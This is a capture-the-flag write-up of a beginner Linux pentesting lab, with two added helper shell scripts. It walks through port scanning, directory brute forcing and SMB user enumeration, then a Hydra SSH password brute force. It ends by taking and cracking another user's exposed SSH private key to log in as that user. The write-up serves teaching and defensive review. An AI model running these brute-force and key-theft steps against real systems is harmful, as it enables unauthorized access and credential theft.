Basic Pentesting Writeup
Written on August 29th, 2022 by Mouse
This machine gives a basic introduction to elementary methods for pentesting a web-facing Linux host. We go through service discovery, directory enumeration, password and passphrase brute forcing, and Linux host enumeration.
Recon
We start with a basic nmap scan to find open ports, then scan these ports more aggressively for more information.
Command:
nmap [target]
└─$ nmap [target]
Starting Nmap 7.91 ( https://nmap.org ) at 2022-08-29 14:23 EDT
Nmap scan report for [target]
Host is up (0.026s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds
These are the open ports among the 1000 most common TCP ports that nmap checks by default (a full -p- sweep would be needed to rule out services on unusual ports). Let’s scan each of these more aggressively with version detection and default scripts. The most interesting parts of the scan results are shown below.
Command:
sudo nmap [target] -A -p 22,80,139,445,8009,8080
└─$ sudo nmap [target] -p 22,80,139,445,8009,8080 -A -sV -sC -O
Host is up (0.024s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.7
Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2022-08-29T14:36:05-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-08-29T18:36:05
|_ start_date: N/A
Nmap done: 1 IP address (1 host up) scanned in 20.49 seconds
We see SSH on port 22 running OpenSSH 7.2p2; the 4ubuntu2.4 package suffix points to Ubuntu 16.04. A web server is running on port 80 using Apache httpd 2.4.18. Ports 139 and 445 are Samba 4.3.11 (SMB over NetBIOS and direct SMB respectively), and the host scripts show that SMB signing is disabled and that nmap’s scripts got in with a guest account, so anonymous SMB enumeration is worth a try. Port 8009 is an AJP 1.3 connector and 8080 is Apache Tomcat 9.0.7, which together indicate Tomcat with its AJP connector exposed. One note on the command: -A already enables -sV, -sC, -O and a traceroute, so the extra flags in the run above are redundant; OS detection needs raw sockets, which is why the scan is run with sudo.
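The two-stage scan used above (a quick sweep for open ports, then scripts and version detection against only those ports) is worth automating, because the port list otherwise has to be retyped by hand. The script below is an added example and not code from the original writeup: it parses nmap’s grepable (-oG) output into a comma-separated port list and builds the second-stage command. The stage-one output embedded in it is constructed to match this machine’s results, and [target] is a placeholder rather than a real host.

```shell
#!/bin/sh
# Added example (not from the original writeup): the two-stage nmap workflow
# from the text, automated. Stage one sweeps for open ports with grepable
# output; stage two runs default scripts and version detection only against
# those ports. SAMPLE_GNMAP is constructed stage-one output matching the
# writeup's results; [target] is a placeholder, not a real host.

SAMPLE_GNMAP='# Nmap 7.91 scan initiated
Host: 10.0.0.5 ()  Status: Up
Host: 10.0.0.5 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 8009/open/tcp//ajp13///, 8080/open/tcp//http-proxy///  Ignored State: closed (994)
# Nmap done'

# Read -oG output on stdin and print the open TCP ports as "p1,p2,...".
open_ports_from_gnmap() {
    grep -o '[0-9]*/open/tcp' | cut -d/ -f1 | paste -s -d , -
}

# Build the stage-two command for a target and port list. -sC -sV is used
# rather than -A so the scan does not need root; add -O (and sudo) if OS
# fingerprinting is wanted.
stage_two_cmd() {
    target="$1"
    ports="$2"
    printf 'nmap -p %s -sC -sV -oA stage2 %s\n' "$ports" "$target"
}

# Against a live host the pipeline is:
#   nmap -p- --min-rate 1000 -oG stage1.gnmap "$TARGET"
#   PORTS=$(open_ports_from_gnmap < stage1.gnmap)
#   $(stage_two_cmd "$TARGET" "$PORTS")
# Offline demonstration on the constructed sample:
PORTS=$(printf '%s\n' "$SAMPLE_GNMAP" | open_ports_from_gnmap)
echo "open ports: $PORTS"
stage_two_cmd '[target]' "$PORTS"
```

The -p- sweep in the comment is deliberately the slow part: it is cheap to let it run while you read the banners from the first pass, and it catches services that a default top-1000 scan would miss.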
Let’s visit the web page on port 80.
There is not much to see: a near-empty page, and no robots.txt to hint at hidden paths. A comment in the page’s HTML source, however, mentions a ‘dev notes’ section, which suggests a directory (or virtual host) with a name like ‘devnotes’. Reading the source rather than only the rendered page is always worth the few seconds it takes.
Web Enumeration
Let’s use gobuster in directory mode with the common.txt wordlist from SecLists to brute-force paths on the web server.
Command:
gobuster dir -u [target] -w /path/to/seclists/Discovery/Web-Content/common.txt
└─$ gobuster dir -u [target] -w /usr/share/seclists/Discovery/Web-Content/common.txt
(...)
===============================================================
2022/08/29 14:56:13 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 297]
/.hta (Status: 403) [Size: 292]
/.htpasswd (Status: 403) [Size: 297]
/development (Status: 301) [Size: 320] [--> http://[target]/development/]
/index.html (Status: 200) [Size: 158]
/server-status (Status: 403) [Size: 301]
===============================================================
2022/08/29 14:56:26 Finished
===============================================================
.htaccess, .hta and .htpasswd are not real directories: Apache’s default configuration denies access to any file whose name begins with .ht, so these 403 responses show up on almost every Apache target and can be ignored. The /development directory, on the other hand, looks interesting and matches the ‘dev notes’ hint in the page source.
Navigating to this subdirectory, we find some text files.
j.txt contains:
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
dev.txt contains:
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
These are two useful notes.
j.txt tells us that J’s password is weak enough that K cracked it straight from /etc/shadow, which makes J the obvious target for a password attack. dev.txt complements what we know from the nmap scan: it confirms the Tomcat and SMB setup and pins the Struts version to 2.5.12. A specific, old framework version like that is worth recording, although this writeup does not pursue it.
We know from nmap that this server is running Ubuntu with Samba, and that a guest session was accepted. Let’s use enum4linux to enumerate the SMB service over a null session and, with luck, pull local usernames.
Command:
enum4linux -a [target] > enum.txt
The most interesting part of the output is the enumerated usernames section. We see the following results.
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1000 Unix User\jan (Local User)
We now have two usernames, kay and jan, and with them the identities of the elusive K and J.
Initial Access
We will use Hydra to brute-force Jan’s SSH password, since we know it is weak. We use the username jan and the darkweb2017-top10000 wordlist from SecLists. Hydra itself warns that many SSH servers limit parallel connections and recommends -t 4 for the ssh module; the run below used the default task count and took about 27 minutes.
Command:
hydra -l jan -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt [target] ssh
└─$ hydra -l jan -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt [target] ssh
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-29 15:14:05
[22][ssh] host: [target] login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-08-29 15:41:43
We got a hit! Jan’s password is armando. We can now ssh into Jan’s account.
Command:
ssh jan@[target]
Lateral Movement
Looking around, we see that kay’s home directory is world-readable (drwxr-xr-x), as is her .ssh directory, so jan can read her SSH private key. Her pass.bak, on the other hand, is mode 600 and cannot be read by jan, which is why the key is the way forward.
jan@basic2:~$ cd ..
jan@basic2:/home$ ls
jan kay
jan@basic2:/home$ cd kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
jan@basic2:/home/kay$ cd .ssh
jan@basic2:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
(...)
3Jt1/ZW3XCb76R75sG5h6Q4N8gu5c/M0cdq16H9MHwpdin9OZTqO2zNxFvpuXthY
-----END RSA PRIVATE KEY-----
jan@basic2:/home/kay/.ssh$ exit
logout
Connection to [target] closed.
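The check jan just did by hand, as an added example that is not code from the original writeup: given a home root, list the private keys the current user can read, flag whether each one is world-readable (the misconfiguration that exposed kay’s key) and whether it is passphrase-protected, which decides whether a cracking step is needed at all. The fixture directory, user names and key bodies it builds under mktemp are constructed placeholders; the OpenSSH-format sample holds only the standard openssh-key-v1 header naming the bcrypt KDF, not key material. Because the fixture is owned by whoever runs the script, every file in it passes the readability test; on a real target that -r test is what hides other users’ mode-600 keys.

```shell
#!/bin/sh
# Added example, not code from the original writeup. Lists private keys under a
# home root that the current user can read and reports, for each, whether it is
# world-readable and whether it is passphrase-protected. The fixture built by
# make_fixture is constructed for this example (placeholder key bodies).

# Classify one key file: "<path> <world-readable|owner-only> <encrypted|plaintext>".
classify_key() {
    f="$1"
    # world-readable if the "other" read bit is set (POSIX find -perm -004)
    if [ -n "$(find "$f" -perm -004 2>/dev/null)" ]; then perm=world-readable; else perm=owner-only; fi
    if grep -q '^Proc-Type: 4,ENCRYPTED' "$f"; then
        enc=encrypted          # legacy PEM: cipher and IV sit in the DEK-Info header
    elif grep -q 'BEGIN OPENSSH PRIVATE KEY' "$f"; then
        # new format: the KDF name is inside the base64 blob; bcrypt means a passphrase is set
        if sed '/^-----/d' "$f" | base64 -d 2>/dev/null | grep -a -q bcrypt; then
            enc=encrypted
        else
            enc=plaintext
        fi
    else
        enc=plaintext
    fi
    printf '%s %s %s\n' "$f" "$perm" "$enc"
}

# Walk a home root for the usual key names; only keys the current user can
# actually read are reported (on the target this is what jan could see).
scan_keys() {
    find "$1" -type f \( -name id_rsa -o -name id_dsa -o -name id_ecdsa -o -name id_ed25519 \) 2>/dev/null |
        sort | while IFS= read -r f; do
            if [ -r "$f" ]; then classify_key "$f"; fi
        done
}

# Constructed fixture: three users, three keys, mirroring the target's layout.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/kay/.ssh" "$root/jan/.ssh" "$root/bob/.ssh"
    # kay: legacy PEM, passphrase-protected, left world-readable (the writeup's case)
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
        'DEK-Info: AES-128-CBC,00000000000000000000000000000000' '' \
        'cGxhY2Vob2xkZXI=' '-----END RSA PRIVATE KEY-----' > "$root/kay/.ssh/id_rsa"
    # jan: new OpenSSH format whose header names the bcrypt KDF, world-readable
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' \
        'b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0' \
        '-----END OPENSSH PRIVATE KEY-----' > "$root/jan/.ssh/id_ed25519"
    # bob: legacy PEM, no passphrase, correctly mode 600
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'cGxhY2Vob2xkZXI=' \
        '-----END RSA PRIVATE KEY-----' > "$root/bob/.ssh/id_rsa"
    chmod 644 "$root/kay/.ssh/id_rsa" "$root/jan/.ssh/id_ed25519"
    chmod 600 "$root/bob/.ssh/id_rsa"
    printf '%s\n' "$root"
}

# Offline demonstration; on a live target run: scan_keys /home
ROOT=$(make_fixture)
scan_keys "$ROOT"
rm -rf "$ROOT"
```

A key reported as plaintext can be used with ssh -i immediately; only the encrypted ones need the ssh2john and john step. The same classification is useful from the defender’s side: run it over /home during a build review and anything marked world-readable is a finding regardless of whether it is encrypted.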
The key is encrypted (Proc-Type: 4,ENCRYPTED, with the cipher and IV in the DEK-Info header), so what we need to crack is its passphrase. Let’s try John the Ripper.
First, the SSH key is pasted into a text file, key.txt. We then use ssh2john to convert the private key into a hash format that John understands, and start cracking with the rockyou.txt wordlist.
Command:
python3 /usr/share/john/ssh2john.py key.txt > john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt john.txt
When I ran this command, I got a Python error:
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'
After some Googling, I realised that this is probably an issue with using Python 3. I reran the command with Python 2, and it worked.
After a few minutes, John spat out the passphrase: beeswax. We now have the passphrase for kay’s private key.
We can now SSH into kay’s account using the private key and its passphrase. The private key has been pasted and saved into a file named id_rsa.
Command:
ssh -i id_rsa kay@[target]
At first, this didn’t work. I got a ‘WARNING: UNPROTECTED PRIVATE KEY FILE!’ message, and ssh ignored the key. This happens because ssh refuses to use a private key that other users can read: the file should be readable and writable by its owner only, which is mode rw------- (600). We change the permissions of id_rsa with chmod.
Command:
chmod 600 id_rsa
When I tried to SSH into kay’s account again, it worked.
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$
pass.bak is the final password file and contains the final flag: a password that, unlike jan’s, follows the policy K complained about.
Tools Used
- Nmap
- Gobuster
- Enum4linux
- Hydra
- John the Ripper
Conclusion
In this room, we had a brief overview of a basic methodology for penetration testing a web-facing Linux host. We started out with some reconnaissance to find the services on the server, went on to enumerate the website and find the hidden /development subdirectory, and used SMB enumeration to recover usernames. We then brute-forced jan’s SSH password, cracked the passphrase on kay’s world-readable private key, and eventually managed to SSH into both user accounts.